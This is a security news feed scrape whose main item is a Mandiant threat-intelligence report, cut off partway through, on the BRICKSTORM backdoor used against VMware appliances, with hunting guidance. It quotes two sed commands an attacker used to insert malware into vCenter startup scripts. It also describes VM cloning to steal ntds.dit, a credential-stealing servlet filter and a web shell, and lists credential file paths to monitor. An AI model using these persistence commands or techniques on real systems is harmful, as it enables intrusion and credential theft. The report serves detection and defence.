<li><a href="https://blog.trailofbits.com/2020/06/05/breaking-the-solidity-compiler-with-a-fuzzer/"><strong>Breaking the Solidity Compiler with a Fuzzer</strong></a></li>
</ul>
<p>As always, <a href="https://trailofbits.com/contact/"><strong>contact us</strong></a> if you need help with your next Go project or fuzzing campaign.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Creator Studio may get better color correction features from a tiny acquisition]]></title>
<description><![CDATA[A German firm run by just one developer has been bought by Apple, giving it software to do with color grading and management which may find its way into Final Cut Pro or Pixelmator Pro.Apple has acquired grading app Color.io - image credit: Nick GunnIt's still the case that the biggest single acq...]]></description>
<link>https://tsecurity.de/de/3506864/ios-mac-os/apple-creator-studio-may-get-better-color-correction-features-from-a-tiny-acquisition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3506864/ios-mac-os/apple-creator-studio-may-get-better-color-correction-features-from-a-tiny-acquisition/</guid>
<pubDate>Mon, 11 May 2026 13:55:20 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A German firm run by just one developer has been bought by Apple, giving it software to do with color grading and management which may find its way into Final Cut Pro or Pixelmator Pro.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67601-142435-000-lead-Color-IO-d2-xl.jpg" alt="Photo editing software window showing a riverside sunset scene with a large suspension bridge, city skyline, shimmering water, and a person leaning on a railing in the foreground"><br><span>Apple has acquired grading app Color.io - image credit: <a href="https://www.gunairy.com/blog/color-io-first-impressions">Nick Gunn</a></span></div><br>It's still the case that the biggest single acquisition Apple has ever made is when it bought Beats for <a href="https://appleinsider.com/articles/14/08/01/apple-officially-closes-on-3b-purchase-of-beats-headphones-streaming-service">$3 billion</a>, and got itself Jimmy Iovine and Dr. Dre. While the figures for Apple's latest buy is unlikely to be revealed, it should surely be one of the least the company has ever paid out.<br><br>That's because as confirmed by <a href="https://digital-markets-act-cases.ec.europa.eu/acquisitions">European Union listings</a>, Apple has acquired the German firm Patchflyer and its one employee. According to German business filings, that one employee is managing director Jonathan Marvin Ochmann.<br><br><br> <a href="https://appleinsider.com/articles/26/05/11/apple-creator-studio-may-get-better-color-correction-features-from-a-tiny-acquisition?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244295?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[FSCK 2026 - Closing]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 1x - Views:4 https://media.ccc.de/v/fsck-2026-171-closing

Schön wars! So schnell ist die vierte FSCK vorbei. Ein paar abschließende Worte und ein paar Statistiken

Nick

https://cfp.ctbk.de/fsck-2026/talk/8JWYRN/

#fsck2026

Licensed to the public under https://...]]></description>
<link>https://tsecurity.de/de/3504877/it-security-video/fsck-2026-closing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504877/it-security-video/fsck-2026-closing/</guid>
<pubDate>Sun, 10 May 2026 16:19:23 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 1x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tU_5NdYlaJ4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/fsck-2026-171-closing<br />
<br />
Schön wars! So schnell ist die vierte FSCK vorbei. Ein paar abschließende Worte und ein paar Statistiken<br />
<br />
Nick<br />
<br />
https://cfp.ctbk.de/fsck-2026/talk/8JWYRN/<br />
<br />
#fsck2026<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT-Produktchef Turley im Interview: Wann gibt es keine Token-Limits mehr?]]></title>
<description><![CDATA[Nick Turley verantwortet als Produktchef bei OpenAI die Weiterentwicklung von ChatGPT. Bereits 2026 war er im Podcast bei t3n zu Gast. Seine damaligen Prognosen hat er jetzt, ein Jahr später im Rahmen der Marketing-Messe OMR, eingeordnet und einen Ausblick auf 2027 gegeben.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3504465/it-nachrichten/chatgpt-produktchef-turley-im-interview-wann-gibt-es-keine-token-limits-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504465/it-nachrichten/chatgpt-produktchef-turley-im-interview-wann-gibt-es-keine-token-limits-mehr/</guid>
<pubDate>Sun, 10 May 2026 11:17:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nick Turley verantwortet als Produktchef bei OpenAI die Weiterentwicklung von ChatGPT. Bereits 2026 war er im Podcast bei t3n zu Gast. Seine damaligen Prognosen hat er jetzt, ein Jahr später im Rahmen der Marketing-Messe OMR, eingeordnet und einen Ausblick auf 2027 gegeben.
<a href="https://t3n.de/news/chatgpt-produktchef-turley-interview-token-limits-entwicklung-ausblick-openai-1741701/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors]]></title>
<description><![CDATA[Written by: Sarah Yoder, John Wolfram, Ashley Pearson, Doug Bienstock, Josh Madeley, Josh Murchie, Brad Slaybaugh, Matt Lin, Geoff Carstairs, Austin Larsen

Introduction
Google Threat Intelligence Group (GTIG) is tracking BRICKSTORM malware activity, which is being used to maintain persistent acc...]]></description>
<link>https://tsecurity.de/de/3504169/it-security-nachrichten/another-brickstorm-stealthy-backdoor-enabling-espionage-into-tech-and-legal-sectors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504169/it-security-nachrichten/another-brickstorm-stealthy-backdoor-enabling-espionage-into-tech-and-legal-sectors/</guid>
<pubDate>Sun, 10 May 2026 08:09:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Sarah Yoder, John Wolfram, Ashley Pearson, Doug Bienstock, Josh Madeley, Josh Murchie, Brad Slaybaugh, Matt Lin, Geoff Carstairs, Austin Larsen</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span></h3>
<p><span>Google Threat Intelligence Group (GTIG) is tracking BRICKSTORM malware activity, which is being used to maintain persistent access to victim organizations in the United States. Since March 2025, Mandiant Consulting has responded to intrusions across a range of industry verticals, most notably legal services, Software as a Service (SaaS) providers, Business Process Outsourcers (BPOs), and Technology. The value of these targets extends beyond typical espionage missions, potentially providing data to feed development of zero-days and establishing pivot points for broader access to downstream victims.</span></p></div>
<div class="block-aside"><dl>
    <dt>aside_block</dt>
    <dd>&lt;ListValue: [StructValue([('title', 'BRICKSTORM Scanner'), ('body', &lt;wagtail.rich_text.RichText object at 0x7f38428ae430&gt;), ('btn_text', 'Get the tool!'), ('href', 'https://github.com/mandiant/brickstorm-scanner'), ('image', None)])]&gt;</dd>
</dl></div>
<div class="block-paragraph_advanced"><p><span>We attribute this activity to <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability">UNC5221</a> and closely related, suspected China-nexus threat clusters</span><span> that employ sophisticated capabilities, including the exploitation of zero-day vulnerabilities targeting network appliances. While UNC5221 has been used synonymously with the actor publicly reported as Silk Typhoon, GTIG does not currently consider the two clusters to be the same. </span></p>
<p><span>These intrusions are conducted with a particular focus on maintaining long-term stealthy access by deploying backdoors on appliances that do not support traditional endpoint detection and response (EDR) tools. The actor employs methods for lateral movement and data theft that generate minimal to no security telemetry. This, coupled with modifications to the BRICKSTORM backdoor, has enabled them to remain undetected in victim environments for 393 days, on average. Mandiant strongly encourages organizations to reevaluate their threat model for appliances and conduct hunt exercises for this highly evasive actor. We are sharing an updated threat actor lifecycle for BRICKSTORM associated intrusions, along with specific and actionable steps organizations should take to hunt for and protect themselves from this activity.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/brickstorm-targeting.max-1000x1000.jpg" alt="BRICKSTORM targeting">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="zijmv">Figure 1: BRICKSTORM targeting</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Threat Actor Lifecycle</span></h3>
<p><span>The actor behind BRICKSTORM employs sophisticated techniques to maintain persistence and minimize the visibility traditional security tools have into their activities. The section is a review of techniques observed from multiple Mandiant investigations, with customer details sanitized.</span></p>
<h4><span>Initial Access</span></h4>
<p><span>A consistent challenge across Mandiant investigations into BRICKSTORM intrusions has been determining the initial intrusion vector. In many cases, the average dwell time of 393 days exceeded log retention periods and the artifacts of the initial intrusion were no longer available. Despite these challenges, a pattern in the available evidence points to the actor's focus on compromising perimeter and remote access infrastructure.</span></p>
<p><span>In at least one case, the actor gained access by </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement"><span>exploiting a zero-day vulnerability</span></a><span>. Mandiant has identified evidence of this actor operating from several other edge appliances early in the lifecycle, but could not find definitive evidence of vulnerability exploitation. As noted in our previous </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability"><span>blog post</span></a><span> from April 2025, Mandiant has identified the use of post-exploitation scripts that have included a wide range of anti-forensics functions designed to obscure entry.</span></p>
<h4><span>Establish Foothold</span></h4>
<p><span>The primary backdoor used by this actor is BRICKSTORM, as previously </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement"><span>discussed</span></a><span> by Mandiant and others. BRICKSTORM includes SOCKS proxy functionality and is written in Go, which has wide cross-platform support. This is essential to support the actor’s preference to deploy backdoors on appliance platforms that do not support traditional EDR tools. Mandiant has found evidence of BRICKSTORM on Linux and BSD-based appliances from multiple manufacturers. Although there is </span><a href="https://blog.nviso.eu/wp-content/uploads/2025/04/NVISO-BRICKSTORM-Report.pdf" rel="noopener" target="_blank"><span>evidence of a BRICKSTORM variant for Windows</span></a><span>, Mandiant has not observed it in any investigation. Appliances are often poorly inventoried, not monitored by security teams, and excluded from centralized security logging solutions. While BRICKSTORM has been found on many appliance types, UNC5221 consistently targets VMware vCenter and ESXi hosts. In multiple cases, the threat actor deployed BRICKSTORM to a network appliance prior to pivoting to VMware systems. The actor moved laterally to a vCenter server in the environment using valid credentials, which were likely captured by the malware running on the network appliances.</span></p>
<p><span>Our analysis of samples recovered from different victim organizations has found evidence of active development of BRICKSTORM. While the core functionality has remained, some samples are obfuscated using </span><a href="https://github.com/burrowers/garble" rel="noopener" target="_blank"><span>Garble</span></a><span> and some carry a new version of the custom </span><code>wssoft</code><span> library. Mandiant recovered one sample of BRICKSTORM with a “delay” timer built-in that waited for a hard-coded date months in the future before beginning to beacon to the configured command and control domain. Notably, this backdoor was deployed on an internal vCenter server </span><span>after</span><span> the victim organization had begun their incident response investigation, demonstrating that the threat actor was actively monitoring and capable of rapidly adapting their tactics to maintain persistence.</span></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement"><span>As previously reported</span></a><span>, BRICKSTORM deployments are often designed to blend in with the target appliance, with the naming convention and even the functionality of the sample being designed to masquerade as legitimate activity. Mandiant has identified samples using Cloudflare Workers and Heroku applications for C2, as well as sslip.io or nip.io to resolve directly to C2 IP addresses. From the set of samples we’ve recovered, there has been no reuse of C2 domains across victims.</span></p>
<h4><span>Escalate Privileges</span></h4>
<p><span>At one investigation, Mandiant analyzed a vCenter server and found the threat actor installed a malicious Java Servlet filter for the Apache Tomcat server that runs the web interface for vCenter. A Servlet Filter is code that runs every time the web server receives an HTTP request. Normally, installing a filter requires modifying a configuration file and restarting or reloading the application; however, the actor used a custom dropper that made the modifications entirely in memory, making it very stealthy and negating the need for a restart. The malicious filter, tracked by Mandiant as BRICKSTEAL, runs on HTTP requests to the vCenter web login Uniform Resource Indicators (URIs) </span><code>/web/saml2/sso/*</code><span>. If present, it decodes the </span><code>HTTP Basic</code><span> authentication header, which may contain a username and password. Many organizations use Active Directory authentication for vCenter, which means BRICKSTEAL could capture those credentials. Often, users who log in to vCenter have a high level of privilege in the rest of the enterprise. Previously shared </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944"><span>hardening guidance for vSphere</span></a><span> includes steps that can mitigate the ability of BRICKSTEAL to capture usable credentials in this scenario, such as enforcement of multi-factor authentication (MFA). </span></p>
<p><span>VMware vCenter is an attractive target for threat actors because it acts as the management layer for the vSphere virtualization platform and can take actions on VMs such as creating, snapshotting, and cloning. In at least two cases, the threat actor used their access to vCenter to clone Windows Server VMs for key systems such as Domain Controllers, SSO Identity Providers, and secret vaults. This is a technique that </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944"><span>other threat actors have used</span></a><span>. With a clone of the virtual machine, the threat actor can mount the filesystem and extract files of interest, such as the Active Directory Domain Services database (</span><code>ntds.dit</code><span>). Although these Windows Servers likely have security tools installed on them, the threat actor never powers on the clone so the tools are not executed. The following example shows vCenter VPXD logs of the threat actor using the local vSphere Administrator account to clone a VM.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>2025-04-01 03:37:40 [vim.event.TaskEvent] [info] [VSPHERE.LOCAL\Administrator] [&lt;vCenter inventory object&gt;] [&lt;unique identifier&gt;] [Task: VirtualMachine.clone]
2025-04-01 03:37:49 [vim.event.VmBeingClonedEvent] [info] [VSPHERE.LOCAL\Administrator] [&lt;vCenter inventory object&gt;] [&lt;same unique identifier&gt;] [Cloning DC01 on esxi01, in &lt;vCenter inventory object&gt; to DC01-clone on esxi02, in &lt;vCenter inventory object&gt;]
2025-04-01 03:42:07 [vim.event.VmClonedEvent] [info] [VSPHERE.LOCAL\Administrator] [&lt;vCenter inventory object&gt;] [&lt;unique identifier&gt;] [DC01 cloned to DC01-clone on esxi02,  in &lt;vCenter inventory object&gt;]
2025-04-01 04:05:40 [vim.event.TaskEvent] [info] [VSPHERE.LOCAL\Administrator] [&lt;vCenter inventory object&gt;] [&lt;unique identifier&gt;] [Task: VirtualMachine.destroy]
2025-04-01 04:05:47 [vim.event.VmRemovedEvent] [info] [VSPHERE.LOCAL\Administrator] [&lt;vCenter inventory object&gt;] [&lt;unique identifier&gt;] [Removed DC01-Clone on esxi02 from &lt;vCenter inventory object&gt;]</code></pre></div>
<div class="block-paragraph_advanced"><p><span>In one instance the threat actor used legitimate server administrator credentials to repeatedly move laterally to a system running Delinea (formerly Thycotic) Secret Server. The forensic artifacts recovered from the system were consistent with the execution of a tool, such as </span><a href="https://github.com/denandz/SecretServerSecretStealer" rel="noopener" target="_blank"><span>secret stealer</span></a><span>, to automatically extract and decrypt all credentials stored by the Secret Server application.</span></p>
<h4><span>Move Laterally </span></h4>
<p><span>Typically, at least one instance of BRICKSTORM would be the primary source of hands-on keyboard activity, with two or more compromised appliances serving as backups. To install BRICKSTORM, the actor used legitimate credentials to connect to the appliance, often with SSH. In one instance the actor used credentials known to be stored in a password vault they previously accessed. In another instance they used credentials known to be stored in a PowerShell script the threat actor previously viewed. In multiple cases the actor logged in to either the ESXi web-based UI or the vCenter Appliance Management Interface (VAMI) to enable the SSH service so they could connect and install BRICKSTORM. The following are example VAMI access events that show the threat actor connecting to VAMI and making changes to the SSH settings for vCenter.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>::ffff:&lt;Source IP&gt; &lt;vCenter IP&gt;:5480 - [&lt;timestamp&gt;] "GET / HTTP/1.1" 200 1153 "-" "&lt;User Agent&gt;"
::ffff:&lt;Source IP&gt; &lt;vCenter IP&gt;:5480 - [&lt;timestamp&gt;] "POST /rest/com/vmware/cis/session HTTP/1.1" 200 60 "https://10.0.0.255:5480/" "&lt;User Agent&gt;"
::ffff:&lt;Source IP&gt; &lt;vCenter IP&gt;:5480 - [&lt;timestamp&gt;] "PUT /rest/appliance/access/ssh HTTP/1.1" 200 0 "https://10.0.0.255:5480/" "&lt;User Agent&gt;"</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>Establish Persistence</span></h4>
<p><span>To maintain access to victim environments, the threat actor modified the </span><code>init.d</code><span>, </span><code>rc.local</code><span>, or </span><code>systemd</code><span> files to ensure BRICKSTORM started on appliance reboot. In multiple cases, the actor used the </span><code>sed</code><span> command line utility to modify legitimate startup scripts to launch BRICKSTORM. The following are a few example <code>sed</code> commands executed by the actor on vCenter.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>sed -i s/export TEXTDOMAIN=vami-lighttp/export TEXTDOMAIN=vami-lighttp\n\/path/to/brickstorm/g /opt/vmware/etc/init.d/vami-lighttp

sed -i $a\SETCOLOR_WARNING="echo -en `/path/to/brickstorm`\\033[0;33m" /etc/sysconfig/init</code></pre></div>
<div class="block-paragraph_advanced"><p><span>The threat actor has also created a web shell tracked by Mandiant as SLAYSTYLE on vCenter servers. SLAYSTYLE, </span><a href="https://ctid.mitre.org/blog/2024/05/22/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion/" rel="noopener" target="_blank"><span>tracked by MITRE as BEEFLUSH</span></a><span>, is a JavaServer Pages (JSP) web shell that functions as a backdoor. It is designed to receive and execute arbitrary operating system commands passed through an HTTP request. The output from these commands is returned in the body of the HTTP response.</span></p>
<h4><span>Complete Mission</span></h4>
<p><span>A common theme across investigations is the threat actor’s interest in the emails of key individuals within the victim organization. To access the email mailboxes of target accounts, the threat actor made use of Microsoft Entra ID Enterprise Applications with </span><code>mail.read</code><span> or </span><code>full_access_as_app</code><span> scopes. Both scopes allow the application to access mail in any mailbox. In some cases, the threat actor targeted the mailboxes of developers and system administrators while in other cases, they targeted the mailboxes of individuals involved in matters that align with PRC economic and espionage interests.</span></p>
<p><span>When the threat actor exfiltrated files from the victim environment, they used the SOCKS proxy feature of BRICKSTORM to tunnel their workstation and directly access systems and web applications of interest. In multiple cases the threat actor used legitimate credentials to log in to the web interface for internal code stores and download repositories as ZIP archives. In other cases the threat actor browsed to specific directories and files on remote machines by specifying Windows Universal Naming Convention (UNC) paths.</span></p>
<p><span>In several cases the BRICKSTORM samples deployed by the threat actor were removed from compromised systems. In these cases, the presence of BRICKSTORM was observed by conducting forensic analysis of backup images that identified the BRICKSTORM malware in place.</span></p></div>
<div class="block-paragraph_advanced"><h3><span>Hunting Guidance</span></h3>
<p><span>Mandiant has previously discussed the diminishing usefulness of atomic IOCs and the need to adopt TTP-based hunting. Across BRICKSTORM investigations we have not observed the reuse of C2 domains or malware samples, which, coupled with high operational security, means these indicators quickly expire or are never observed at all. Therefore, a TTP-based hunting approach is not only an ideal practice, but a necessity to detect patterns of attack that are unlikely to be detected by traditional signature-based defenses. The following is a checklist of the minimal set of hunts Mandiant recommends organizations conduct to search for BRICKSTORM and related activities.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Step</strong></p>
</td>
<td>
<p><strong>Hunt</strong></p>
</td>
<td>
<p><strong>Data Sources</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>0</span></p>
</td>
<td>
<p><span>Create or update asset inventory that includes edge devices and other appliances</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>1</span></p>
</td>
<td>
<p><span>File and backup scan for BRICKSTORM</span></p>
</td>
<td>
<p><span>Appliance file system, backups</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2</span></p>
</td>
<td>
<p><span>Internet traffic from edge devices and appliances</span></p>
</td>
<td>
<p><span>Firewall connection logs, DNS logs, IDS/IPS, netflow</span></p>
</td>
</tr>
<tr>
<td>
<p><span>3</span></p>
</td>
<td>
<p><span>Access to Windows servers and desktops from appliances</span></p>
</td>
<td>
<p><span>EDR telemetry, Security Event Logs, Terminal Service Logs, Windows UAL</span></p>
</td>
</tr>
<tr>
<td>
<p><span>4</span></p>
</td>
<td>
<p><span>Access to credentials and secrets</span></p>
</td>
<td>
<p><span>Windows Shellbags, EDR telemetry</span></p>
</td>
</tr>
<tr>
<td>
<p><span>5</span></p>
</td>
<td>
<p><span>Access to M365 mailboxes using Enterprise Application</span></p>
</td>
<td>
<p><span>M365 UAL</span></p>
</td>
</tr>
<tr>
<td>
<p><span>6</span></p>
</td>
<td>
<p><span>Cloning of sensitive virtual machines</span></p>
</td>
<td>
<p><span>vSphere VPXD logs</span></p>
</td>
</tr>
<tr>
<td>
<p><span>7</span></p>
</td>
<td>
<p><span>Creation of local vCenter and ESXi accounts</span></p>
</td>
<td>
<p><span>VMware audit events</span></p>
</td>
</tr>
<tr>
<td>
<p><span>8</span></p>
</td>
<td>
<p><span>SSH enablement on vSphere platform</span></p>
</td>
<td>
<p><span>VMware audit events, VAMI logs</span></p>
</td>
</tr>
<tr>
<td>
<p><span>9</span></p>
</td>
<td>
<p><span>Rogue VMs</span></p>
</td>
<td>
<p><span>VMware audit events, VM inventory reports</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Create or Update Asset Inventory</span></h4>
<p><span>Foundational to the success of any threat hunt is an asset inventory that includes devices not covered by the standard security tool stack, such as edge devices and other appliances. Because these appliances lack support for traditional security tools an inventory is critical for developing effective compensating controls and detections. Especially important is to track the management interface addresses of these appliances, as they act as the default gateway that malware and threat actor commands will egress out of.</span></p>
<p><span>Mandiant recommends organizations take a multi-step approach to building or updating this inventory:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><strong>Known knowns: </strong><span>Begin with the appliance classes that all organizations use: firewalls, VPN concentrators, virtualization platforms, conferencing systems, badging, and file storage.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Known unknowns: </strong><span>Work across teams to brainstorm appliance classes that may be more specialized to your organization, but the security organization likely lacks visibility into.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Unknown unknowns: </strong><span>These are the appliances that were supposed to be decommissioned but weren’t, sales POVs, and others. Consider using network visibility tools or your existing EDR to scan for “live” IP addresses that do not show in your EDR reports. This has the added benefit of identifying unmanaged devices that should have EDR but don’t.</span></p>
</li>
</ol></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/brickstorm-iceberg.max-1000x1000.jpg" alt="Asset inventory">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fih1y">Figure 2: Asset inventory</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>File and Backup Scan for BRICKSTORM</span></h4>
<p><span>YARA rules have proven to be the most effective method for detecting BRICKSTORM binaries on appliances. We are sharing relevant YARA rules in the appendix section of this post. Yara can be difficult to run at scale, but some backup solutions provide the ability to run YARA across the backup data store. Mandiant is aware of multiple customers who have identified BRICKSTORM through this method. </span></p>
<p><span>To aid organizations in hunting for BRICKSTORM activity in their environments, </span><a href="https://github.com/mandiant/brickstorm-scanner" rel="noopener" target="_blank"><span>Mandiant released a scanner script</span></a><span>, which can run on appliances and other Linux or BSD-based systems. </span></p>
<h4><span>Internet Traffic from Edge Devices and Appliances</span></h4>
<p><span>Use the inventory of appliance management IP addresses to hunt for evidence of malware beaconing in network logs. In general, appliances should not communicate with the public Internet from management IP addresses except to download updates and send crash analytics to the manufacturer. </span></p>
<p><span>Established outbound traffic to domains or IP addresses not controlled by the appliance manufacturer should be regarded as very suspicious and warranting forensic review of the appliance. BRICKSTORM can use DNS over HTTP (DoH), which should be similarly rare when sourced from appliance management IP addresses.</span></p>
<h4><span>Access to Windows Systems from Appliances</span></h4>
<p><span>The threat actor primarily accessed Windows machines (both desktops and servers) using type 3 (network) logins, although in some cases the actor also established RDP sessions. Appliances should rarely log in to Windows desktops or servers and any connections should be treated as suspicious. Some examples of false positives could include VPN appliances using a known service account to connect to a domain controller in order to perform LDAP lookups and authenticated vulnerability scanners using a well-known service account. </span></p>
<p><span>In addition to EDR telemetry, Terminal Services logs and Security event logs, defenders should obtain and parse the </span><a href="https://learn.microsoft.com/en-us/windows-server/administration/user-access-logging/get-started-with-user-access-logging" rel="noopener" target="_blank"><span>Windows User Access Log (UAL)</span></a><span>. The UAL is stored on Windows Servers inside the directory </span><code>Windows\System32\LogFiles\Sum</code><span> and can be parsed using open-source tools such as </span><a href="https://ericzimmerman.github.io/#!index.md" rel="noopener" target="_blank"><code>SumECmd</code></a><span>. This log source records attempted authenticated connections to Windows systems and often retains artifacts going back much longer than typical Windows event logs. Note that this log source includes successful and unsuccessful logins, but is still useful to identify suspicious activity sourced from appliances.</span></p>
<h4><span>Access to Credentials and Secrets</span></h4>
<p><span>Use the forensic capabilities of EDR tools to acquire </span><a href="https://medium.com/ce-digital-forensics/shellbag-analysis-18c9b2e87ac7" rel="noopener" target="_blank"><span>Windows Shellbags</span></a><span> artifacts from Windows workstations and servers. Shellbags records folder paths that are browsed by a user with the Windows Explorer application. Use an </span><a href="https://github.com/williballenthin/shellbags" rel="noopener" target="_blank"><span>open-source parser</span></a><span> to extract the relevant data and look for patterns of activity that are suspicious:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Access to folder paths where the initiating user is a service account, especially service accounts that are unfamiliar or rarely used</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>File browsing activity sourced from servers that include a Windows Universal Naming Convention (UNC) path that points to a workstation (e.g., </span><code>\\bobwin7.corp.local\browsing\path)</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>File browsing activity to folder paths that contain credential data, such as:</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Browser profile paths (e.g., </span><code>%appdata%\Mozilla\Firefox\Profiles</code><span>)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Appdata locations used to store session tokens (e.g., </span><code>Users\&lt;username&gt;\.azure\</code><span>)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Windows credential vault (</span><code>%appdatalocal%\Microsoft\Credentials</code><span>)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Data Protection API (DPAPI) keys (</span><code>%appdata%\Microsoft\Protect\&lt;SID&gt;\</code><span>)</span></p>
</li>
</ul>
</ul>
<h4><span>Access to M365 Mailboxes using Enterprise Application</span></h4>
<p><span>Mandiant has observed this actor use common techniques to conduct bulk email access and exfiltration from Microsoft 365 Exchange Online. Organizations should follow our guidance outlined in our APT29 </span><a href="https://services.google.com/fh/files/misc/remediation-and-hardening-strategies-for-microsoft-wp-en.pdf" rel="noopener" target="_blank"><span>whitepaper</span></a><span> to hunt for these techniques. Although the white paper specifically references APT29, these techniques have become widely used by many groups. In multiple investigations the threat actor used a Microsoft Entra ID Enterprise Application with </span><code>mail.read</code><span> or </span><code>full_access_as_app</code><span> scopes to access mailboxes of key individuals in the victim organization.</span></p>
<p><span>To hunt for this activity, we recommend a phased approach:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Enumerate the Enterprise Applications and Application Registrations with graph permissions that can read all mail.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>For each application, validate that there is at least one secret or certificate configured for it. Record the Application (client) ID</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Conduct a free text search against the Unified Audit Log or the </span><code>OfficeActivity</code><span> table in Sentinel for the client IDs from step 2. This will return the </span><code>mailitemsaccessed</code><span> events that recorded the application accessing mail.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>For each application analyze the source IP addresses and user-agent strings for discrepancies. Legitimate usage of the applications should occur from well-defined IP addresses. Additionally, look for focused interest in key personnel mailboxes across multiple days.</span></p>
</li>
</ol>
<p><span>When accessing M365 and other internet-facing services the actor has used multiple commercial VPN and proxy providers. Mandiant has found evidence of the threat actor using PIA, NordVPN, Surfshark, VPN Unlimited, and PrivadoVPN, although there is no reason for these to be the only solutions used. There is also evidence to support that this actor has access to a purpose-built obfuscation network built from compromised small office/home office routers. Mandiant has no knowledge of how these routers are being compromised. The exit nodes for commercial VPNs and obfuscation networks change rapidly and sharing atomic indicators for hunting purposes is unlikely to yield results. Instead, identify the key individuals in the organization, with respect to the organization vertical and likely goals of the threat actor. Fetch </span><code>mailitemsaccessed</code><span> logs for those mailboxes for the last year or as long as retention allows. Analyze the </span><code>SessionID</code><span> values of the log events and look for IDs that span multiple IP addresses where the IP addresses are not in the user’s typical geographic location.</span></p>
<h4><span>Cloning of Sensitive Virtual Machines</span></h4>
